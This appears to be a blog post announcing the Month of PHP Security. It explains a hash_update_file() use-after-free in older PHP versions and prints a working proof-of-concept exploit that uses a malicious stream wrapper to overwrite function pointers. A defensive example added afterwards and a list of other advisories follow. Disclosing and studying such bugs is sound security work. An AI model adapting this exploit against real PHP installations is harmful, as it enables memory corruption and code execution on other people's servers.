
May is PHP Security Month

Did you know that May is the official Month of PHP Security?  The Month of PHP Security (MOPS) began with Stefan Esser, a PHP security specialist.  It's connected to Esser's Month of PHP Bugs, which started in 2007.  Esser and the PHP community will post submissions throughout the month that describe vulnerabilities in PHP applications or in the language itself.

The first post, by Esser, is about a vulnerability that was disclosed to the public three years ago during Esser's 2007 Month of PHP Bugs.  In the affected versions (PHP 5.2 <= 5.2.13 and PHP 5.3 <= 5.3.2), hash_update_file() reads the data it hashes from a stream.  If that stream is backed by a malicious userspace stream handler, the handler's read callback runs while the hash is still in progress: it can destroy the hash resource and replace it with a customized fake resource carrying a modified hash function pointer table.  When the internal function continues hashing, it calls the overwritten function pointer and so executes malicious code.  The following code exploits the vulnerability; in the normal case it crashes PHP by attempting to execute at 0x55555555:

```php
<?php
// Address the hash context's function pointers will be overwritten with;
// executing at 0x55555555 crashes the interpreter in the normal case.
define("OFFSET", pack("L", 0x55555555));

class AttackStream {
    function stream_open($path, $mode, $options, &$opened_path)
    {
        return true;
    }

    // Called by hash_update_file() while the hash is still in progress.
    function stream_read($count)
    {
        // Finalize (and thereby destroy) the hash resource being updated...
        hash_final($GLOBALS['hid'], true);
        // ...then reoccupy the freed memory with the fake pointer table.
        $GLOBALS['aaaaaaaaaaaaaaaaaaaaaa'] = str_repeat(OFFSET, 3);
        return "A";
    }

    function stream_eof()
    {
        return true;
    }

    function stream_seek($offset, $whence)
    {
        return false;
    }
}

stream_wrapper_register("attack", "AttackStream") or die("Failed to register protocol");

$hid = hash_init('md5');
hash_update_file($hid, "attack://nothing");
```

To protect against this vulnerability, you'll need to implement a resource usage counter for internal functions.
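The following is an added example, not code from the DZone article or from Esser's advisory, that shows the defender's side of the same mechanism.  A benign userspace wrapper (the TraceStream class and the trace:// scheme are this example's own names) logs the moment PHP calls back into user code while hash_update_file() is still running, which is the interruption point the exploit above abuses.  A hypothetical helper, hash_local_file(), then shows the application-level precaution: never pass an attacker-influenced path to a hashing function, so that no userspace wrapper can be reached at all.  It assumes PHP 7.4 or later.

```php
<?php
// Added example (not from the article or the MOPS advisory). TraceStream,
// trace:// and hash_local_file() are names chosen for this example.

final class TraceStream
{
    /** @var string[] constructed call log, shared so the caller can inspect it */
    public static array $log = [];

    private string $data = "constructed sample payload\n";
    private int $pos = 0;
    public $context; // PHP assigns this property on wrapper instances

    public function stream_open($path, $mode, $options, &$opened_path): bool
    {
        self::$log[] = "stream_open($path)";
        return true;
    }

    public function stream_read($count): string
    {
        // This callback executes *inside* the internal hash_update_file() call.
        // In the affected PHP versions, user code here could call hash_final()
        // on the very resource being updated and free its context mid-operation.
        self::$log[] = "stream_read($count) while the hash is in progress";
        $chunk = substr($this->data, $this->pos, $count);
        $this->pos += strlen($chunk);
        return $chunk;
    }

    public function stream_eof(): bool
    {
        return $this->pos >= strlen($this->data);
    }
}

stream_wrapper_register("trace", TraceStream::class)
    or die("Failed to register trace:// wrapper\n");

// 1. Show the interruption point: user code runs between hash_init() and the
//    return of hash_update_file().
$ctx = hash_init('sha256');
TraceStream::$log[] = "hash_update_file() entered";
hash_update_file($ctx, "trace://anything");
TraceStream::$log[] = "hash_update_file() returned";
echo implode("\n", TraceStream::$log), "\n";
echo "digest: ", hash_final($ctx), "\n";

// 2. Precaution at the application level: only hash plain local files, so an
//    attacker-supplied path can never route hashing through a stream wrapper.
function hash_local_file(string $algo, string $path): string
{
    // Explicitly refuse URL-style input ("attack://", "php://", "data:", ...).
    // The scheme must be at least two characters so a Windows drive letter
    // such as "C:\..." is not mistaken for one; realpath() below is the
    // authoritative check and also rejects every wrapper path.
    if (preg_match('#^[A-Za-z][A-Za-z0-9+.-]+:#', $path)) {
        throw new InvalidArgumentException("refusing non-local path: $path");
    }
    $real = realpath($path);
    if ($real === false || !is_file($real)) {
        throw new InvalidArgumentException("not a regular file: $path");
    }
    return hash_file($algo, $real);
}

$tmp = tempnam(sys_get_temp_dir(), 'mops');
file_put_contents($tmp, "constructed sample payload\n");
echo "local: ", hash_local_file('sha256', $tmp), "\n";
try {
    hash_local_file('sha256', "trace://anything");
} catch (InvalidArgumentException $e) {
    echo "blocked: ", $e->getMessage(), "\n";
}
unlink($tmp);
```

Run it with the PHP CLI; the printed log shows stream_open() and stream_read() entries sandwiched between "entered" and "returned", and the two digests match because both inputs are the same constructed text.  The real fix for the bug itself is the upgraded PHP release; the helper only reduces how much untrusted input reaches hash_update_file() in the first place.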

Here are the other submissions that have arrived for the Month of PHP Security (so far):

  • PHP addcslashes() Interruption Information Leak Vulnerability
  • PHP dechunk Filter Signed Comparison Vulnerability
  • PHP sqlite_array_query() Uninitialized Memory Usage Vulnerability
  • PHP sqlite_single_query() Uninitialized Memory Usage Vulnerability
  • sqlite_single_query(), sqlite_array_query() Uninitialized Memory Usage
  • PHP html_entity_decode() Interruption Information Leak Vulnerability
  • PHP shm_put_var() Already Freed Resource Access Vulnerability
  • Context-aware HTML escaping
  • PHP Stream Context Use After Free on Request Shutdown Vulnerability
  • PHP fnmatch() Stack Exhaustion Vulnerability
  • PHP preg_quote() Interruption Information Leak Vulnerability
  • Generating Unpredictable Session IDs and Hashes

PHP Applications
  • ClanTiger Shoutbox Module s_email SQL Injection Vulnerability
  • ClanSphere MySQL Driver Generic SQL Injection Vulnerability
  • ClanSphere Captcha Generator Blind SQL Injection Vulnerability
  • Campsite TinyMCE Article Attachment SQL Injection Vulnerability
  • PHP ZEND_SR Opcode Interruption Address Information Leak Vulnerability
  • PHP ZEND_SL Opcode Interruption Address Information Leak Vulnerability
  • PHP ZEND_BW_XOR Opcode Interruption Address Information Leak Vulnerability
  • DeluxeBB newthread SQL Injection Vulnerability
  • Cacti Graph Viewer SQL Injection Vulnerability
  • The Minerva PHP Fuzzer
  • Xinha WYSIWYG Plugin Configuration Injection Vulnerability
  • Serendipity WYSIWYG Editor Plugin Configuration Injection Vulnerability
  • EFront ask_chat chatrooms_ID SQL Injection Vulnerability

  • A New Open Source Tool: OWASP ESAPI for PHP - For writing PHP security controls
  • PHP Web Security Poster
  • How to Decode a User Space Encoded PHP Script
